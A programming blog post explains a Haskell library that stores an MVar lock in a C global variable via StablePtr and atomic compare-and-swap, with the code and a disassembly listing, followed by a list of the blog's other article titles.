My new solution is to store an MVar lock in a C global variable via StablePtr. I've implemented this, and it seems to work. I'd appreciate if people could bang on this code and report any issues.

You can get the library from Hackage or browse the source, including a test program. You can also use this code as a template for including a similar lock in your own Haskell project.

The C code

On the C side, we declare a global variable and a function to read that variable.

static void* global = 0;

void* hs_globalzmlock_get_global(void) {
    return global;
}

To avoid name clashes, I gave this function a long name based on the z-encoding of my package's name. The variable named global will not conflict with another compilation unit, because it's declared static.

Another C function will set this variable, if it was previously 0. Two threads might execute this code concurrently, so we use a GCC built-in for atomic memory access.

int hs_globalzmlock_set_global(void* new_global) {
    void* old = __sync_val_compare_and_swap(&global, 0, new_global);
    return (old == 0);
}

If old is not 0, then someone has already set global, and our assignment was dropped. We report this condition to the caller.

Foreign imports

On the Haskell side, we import these C functions.

foreign import ccall unsafe "hs_globalzmlock_get_global"
    c_get_global :: IO (Ptr ())

foreign import ccall "hs_globalzmlock_set_global"
    c_set_global :: Ptr () -> IO CInt

The unsafe import of c_get_global demands justification. This wrinkle arises from the fact that GHC runs many Haskell threads on the same OS thread. A long-running foreign call from that OS thread might block unrelated Haskell code. GHC prevents this by moving the foreign call and/or other Haskell threads to a different OS thread. This adds latency to the foreign call — about 100 nanoseconds in my tests.

In most cases a 100 ns overhead is negligible. But it matters for functions which are guaranteed to return in a very short amount of time. And blocking other Haskell threads during such a short call is fine. Marking the import unsafe tells GHC to ignore the blocking concern, and generate a direct C function call.

Our function c_get_global is a good use case for unsafe, because it simply returns a global variable. In my tests, adding unsafe decreased the overall latency of locking by about 50%. We cannot use unsafe with c_set_global because, in the worst case, GCC implements atomic operations with blocking library functions. That's okay because c_set_global will only be called a few times anyway.

The Haskell code

Now we have access to a C global of type void*, and we want to store a Haskell value of type MVar (). The StablePtr module is just what we need. A StablePtr is a reference to some Haskell expression, which can be converted to Ptr (), aka void*. There is no guarantee about this Ptr () value, except that it can be converted back to the original StablePtr.

Here's how we store an MVar:

set :: IO ()
set = do
    mv  <- newMVar ()
    ptr <- newStablePtr mv
    ret <- c_set_global (castStablePtrToPtr ptr)
    when (ret == 0) $
        freeStablePtr ptr

It's fine for two threads to enter set concurrently. In one thread, the assignment will be dropped, and c_set_global will return 0. In that case we free the unused StablePtr, and the MVar will eventually be garbage-collected. StablePtrs must be freed manually, because the GHC garbage collector can't tell if some C code has stashed away the corresponding void*.

Now we can retrieve the MVar, or create it if necessary.

get :: IO (MVar ())
get = do
    p <- c_get_global
    if p == nullPtr
        then set >> get
        else deRefStablePtr (castPtrToStablePtr p)

In the common path, we do an unsynchronized read on the global variable. Only if the variable appears to contain NULL do we allocate an MVar, perform a synchronized compare-and-swap, etc. This keeps overhead low, and makes this library suitable for fine-grained locking.

All that's left is the user-visible locking interface:

lock :: IO a -> IO a
lock act = get >>= flip withMVar (const act)

Inspecting the machine code

Just for fun, let's see how GCC implements __sync_val_compare_and_swap on the AMD64 architecture.

$ objdump -d dist/build/cbits/global.o
...
0000000000000010 <hs_globalzmlock_set_global>:
  10:   31 c0                   xor    %eax,%eax
  12:   f0 48 0f b1 3d 00 00    lock cmpxchg %rdi,0x0(%rip)
  19:   00 00
....

This lock cmpxchg is the same instruction used by the GHC runtime system for its own atomic compare-and-swap. The offset on the operand 0x0(%rip) will be relocated to point at global.

main is usually a function

A Rust view on Effective Modern C++

Chapters 1 & 2: Deducing Types / auto

Chapter 3: Moving to Modern C++

Chapter 4: Smart Pointers

Chapter 5: Rvalue References, Move Semantics, and Perfect Forwarding

Chapter 6: Lambda Expressions

Chapter 7: The Concurrency API

Chapter 8: Tweaks

Conclusions

Modeling garbage collectors with Alloy: part 1

The model

Relations

Dynamics

Interacting with Alloy

SAT solvers and bounded model checking

Conclusion

html5ever project update: one year!

The future

Turing tarpits in Rust's macro system

Notes about the macro

151-byte static Linux binary in Rust

Linking

The final trick

A taste of Rust (yum) for C/C++ programmers

Raw system calls for Rust

Calling a Rust library from C (or anything else!)

Using html5ever from C

Implementing the C API

x86 is Turing-complete with no registers

Introduction

No registers?

The instruction set

Compiling from Brainfuck

Demos

Verifying it with ptrace

Notes on universality

A shell recipe for backups with logs and history

Hex-editing Linux kernel modules to support new hardware

Attacking hardened Linux systems with kernel JIT spraying

Kernel exploitation and SMEP

JIT spraying

Attacking the BPF JIT

Filling memory with sockets

The exploit

Notes

Tracking down unused variables with Pyflakes and git bisect

taralli: Screen edge pointer wrapping for X

Automatic binary hardening with Autoconf

How it works

Complications

The flags

Demonstration

Performance

Scheme without special forms: a metacircular adventure

Operatives in Qoppa

Implementing Qoppa

Qoppa builtins

Scheme as a Qoppa library

Testing

A minimal encoder for uncompressed PNGs

Continuations in C++ with fork

Small examples

Backtracking

Solving a maze

Excess backtracking

The implementation

Generating random functions

The data structure

Testing

How many functions?

See also

Writing kernel exploits

Embedding GDB breakpoints in C source code

Zombie 6.001 starts tomorrow!

Propane: Functional synthesis of images and animations in Haskell

Self-modifying code for debug tracing in quasi-C

The design

The TRACE macro

The linker script

Chapters 1 & 2: Deducing Types / `auto`

Verifying it with `ptrace`

The `TRACE` macro